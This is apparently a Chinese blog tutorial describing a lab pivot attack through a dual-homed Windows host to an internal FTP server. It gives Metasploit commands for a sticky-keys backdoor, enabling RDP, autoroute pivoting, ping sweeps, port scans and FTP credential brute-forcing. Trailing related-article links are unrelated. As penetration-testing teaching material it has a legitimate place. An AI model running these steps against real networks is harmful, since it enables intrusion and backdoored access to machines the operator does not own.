简单来说,这是攻击者可以利用属于不同网络的那些系统的攻击。

本文作者:jishuzhain

对于这种攻击,攻击者需要利用主服务器来帮助攻击者将自己添加到本地网络中,然后攻击者就可以将客户端系统进行定位,然后攻击。

实验环境要求:

攻击机:Kali Linux

枢纽机:具有两个网络接口的windows系统

目标机器:windows7(允许FTP服务)

利用枢纽机

使用exploit MS17-010或多种处理程序来攻击枢纽机器并绕过其UAC来实现管理员权限。

sessions

从给定的截图中可以确认我拥有的枢纽机器(192.168.0.101)是meterpreter session 1。

发起粘滞键攻击

这里我需要漏洞利用来发起粘性攻击

use post / windows / manage /sticky_keys

msf post(sticky_keys)> setsession 1

msf post(sticky_keys)> exploit

它已经在枢纽机器中成功发起了粘性攻击,现在我们将利用它来建立与目标FTP服务器的连接。

启用RDP服务

打开meterpreter session1并键入以下命令,这将启用远程桌面服务在枢转机器中。

Meterpreter>run getgui -e

验证枢轴的网络接口

通过以下命令检查网络接口:

Meterpreter> ifconfig

从给定的图像可以在旋转的系统观察两个网络接口,  1 日 为IP  192.168.0.101 通过攻击者连接和  2 次  为IP  192.168.100.102  通过FTP服务器(目标)连接。

使用autoroute后利用

因为攻击者属于  192.168.0.1  接口,客户端属于  192.168.100.0  接口,因此除非攻击者c处于同一个网络连接,否则不可能直接对客户端进行攻击。为了实现192.168.100.0网络攻击者需要运行 后利用模块  “autoroute”。

该模块通过现有的Meterpreter会话管理会话路由。它可以使其他模块在连接到命名的NETWORK和SUBMASK时通过受感染的主机进行“转发”。Autoadd将从路由表和接口列表中搜索有效子网的会话,然后向其添加路由。默认值将添加一个默认路由,使得MSF路由表中未指定的所有TCP / IP流量将在枢转时路由通过会话。

use post / multi / manage /autoroute

msf post(autoroute)>setsession 1

msf post(autoroute)> exploit

使用Ping扫描后利用

该模块将使用包含操作系统的ping命令执行IPv4 ping扫描。

use post / windows / gather / ping_sweep

msf post(ping_sweep)> setrhosts 192.168.100.1-110

msf post(ping_sweep)>setsession 1

msf post(ping_sweep)> exploit

在这里我们找到了一个新的主机IP  192.1668.100.103  ,如图所示。我们对本机上激活的服务执行TCP端口扫描。

使用TCP端口扫描 后利用

此模块通过在每个端口上执行完整的TCP连接来枚举打开的TCP服务。这不需要源计算机的管理权限,这在枢纽时可能很有用。

use auxiliary/ scanner / portscan / tcp

msf auxiliary(tcp) > set ports 21

msf auxiliary(tcp) > set rhosts192.168.100.103

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

从给定的截图你可以观察  21端口是开放的,我们知道端口21用于FTP服务。

FTP暴力登录

该模块将测试一系列机器上的FTP登录并报告成功登录。如果您加载了数据库插件并连接到数据库,则该模块将记录成功的登录和主机,以便您可以跟踪您的访问。

use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts192.168.100.103

msf auxiliary(ftp_login) > setuser_file /root/Desktop/user.txt

msf auxiliary(ftp_login) > setpass_file /root/Desktop/pass.txt

msf auxiliary(ftp_login) > setstop_on_success true

msf auxiliary(ftp_login) > exploit

从给定的截图可以看出,它显示了用户名:raj  和  密码:123 可以进行登录的匹配组合  。

通过RDP连接到枢轴机器

在kali Linux中打开新终端,并键入以下命令,通过RDP服务与枢纽机器连接

rdesktop 192.168.0.101

如果你还记得之前我们有进行粘性攻击,那么当你按下5次Shift键时,会在登录屏幕上打开命令提示符。

现在按5次Shift键,然后您将获得命令提示符,并键入“ start iexplore.exe ”,这将启动InternetExplore。

连接FTP服务器

在浏览器中输入并执行FTP连接的以下URL:

ftp://192.168.100.103

现在输入我们通过FTP登录暴力攻击即raj:123发现的账号与密码

我们通过枢纽机器与FTP服务器成功连接。

参考来源:http://www.hackingarticles.in/ftp-pivoting-rdp/

FTP枢轴攻击的更多相关文章

  1. 谈FTP服务器攻击技术及其展望 (下)

               上篇回顾:谈FTP服务器攻击技术及其展望 (上)http://chenguang.blog.51cto.com/350944/436876 本文出自 "李晨光原创技术博 ...

  2. 谈FTP服务器攻击技术及其展望 (修改中)

      欢迎大家给我投票: http://2010blog.51cto.com/350944 请看下篇:谈FTP服务器攻击技术及其展望 (下)              全文完http://chengua ...

  3. FTP的20、21端口,工作模式

    什么是FTP? FTP就是文件传输协议 File Transfer Protocol 的缩写. FTP端口号是多少? 21 FTP的端口号能改吗? 能 ftp的端口号20.21有何区别? 一个是数据端 ...

  4. Sftp和ftp 差别、工作原理等(汇总ing)

    Sftp和ftp over ssh2的差别 近期使用SecureFx,涉及了两个不同的安全文件传输协议: -sftp -ftp over SSH2 这两种协议是不同的.sftp是ssh内含的协议,仅仅 ...

  5. FTP(文件传输协议)工作原理

    目前在网络上,如果你想把文件和其他人共享.最方便的办法莫过于将文件放FTP服务器上,然后其他人通过FTP客户端程序来下载所需要的文件. 1.FTP架构 如同其他的很多通讯协议,FTP通讯协议也采用客户 ...

  6. Windows Server 2008 R2常规安全设置及基本安全策略

    这篇文章主要介绍了Windows Web Server 2008 R2服务器简单安全设置,需要的朋友可以参考下 用的腾讯云最早选购的时候悲催的只有Windows Server 2008 R2的系统,原 ...

  7. Nmap扫描手册

    By:WHILE扫描类-sTTCP connect()扫描,完整的通话连接,容易被检测,会被记录日志.-sSTCP同步扫描,不完整的通话连接,很少有系统会记入日志.-sUUDP扫描-sAACK扫描用来 ...

  8. win2003 服务器安全设置详细介绍

    第一步:一.先关闭不需要的端口  我比较小心,先关了端口.只开了3389 21 80 1433(MYSQL)有些人一直说什么默认的3389不安全,对此我不否认,但是利用的途径也只能一个一个的穷举爆破, ...

  9. Nmap使用指南(1)

    Nmap是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具.软件名字Nmap是Network Mapper的简称.Nmap最初是由Fyo ...

随机推荐

  1. javascript中所谓的“坑”收录

    坑一: // 反例myname = "global"; // 全局变量function func() { alert(myname); // "undefined&quo ...

  2. 自己动手搭建Git服务器-Gitblit

      首先到官网http://gitblit.com/下载最新版本的Gitblit GO 解压缩到本地目录中 E:\git\gitblit132 官方文档:http://gitblit.com/setu ...

  3. 系统批量运维管理器pexpect详解

    一.pexpect介绍 pexpect可以理解成Linux下的expect的Python封装,通过pexpect我们可以实现对ssh.ftp.passwd.telnet等命令进行自动交互,而无需人工干 ...

  4. 阿里云EIP按流量计费

    https://help.aliyun.com/document_detail/27767.html 计费周期为1小时,账单周期也为1小时.在一个计费周期内,如果您使用的时间不足一小时,按一小时收费. ...

  5. http://classworlds.codehaus.org/apiusage.html

    API Usage The Java API can be used to create new realms and connect realms together through importat ...

  6. 使用 ipmitool 实现 Linux 系统下对服务器的 ipmi 管理

    http://www.ibm.com/developerworks/cn/linux/l-ipmi/ 1.简介 IPMI(Intelligent Platform Management Interfa ...

  7. 一篇很好的关于mysqld_safe脚本源码解读的文章,收藏了!!

    #!/bin/sh # 一些状态变量的定义 KILL_MYSQLD=; # 试图kill多余的mysqld_safe程序,1表示需要kill MYSQLD= # mysqld二进制可执行文件的名称 n ...

  8. webform调用windows服务

    准备工作: .电脑->管理->本地用户和组->组->Administrator双击->隶属->添加Network service->确定 .启动windows ...

  9. SSL握手通信详解及linux下c/c++ SSL Socket代码举例(另附SSL双向认证客户端代码)

    SSL握手通信详解及linux下c/c++ SSL Socket代码举例(另附SSL双向认证客户端代码) 摘自: https://blog.csdn.net/sjin_1314/article/det ...

  10. cpuinfo

    在Linux系统中,如何详细了解CPU的信息呢? 当然是通过cat /proc/cpuinfo来检查了,但是比如几个物理CPU/几核/几线程,这些问题怎么确定呢? 经过查看,我的开发机器是1个物理CP ...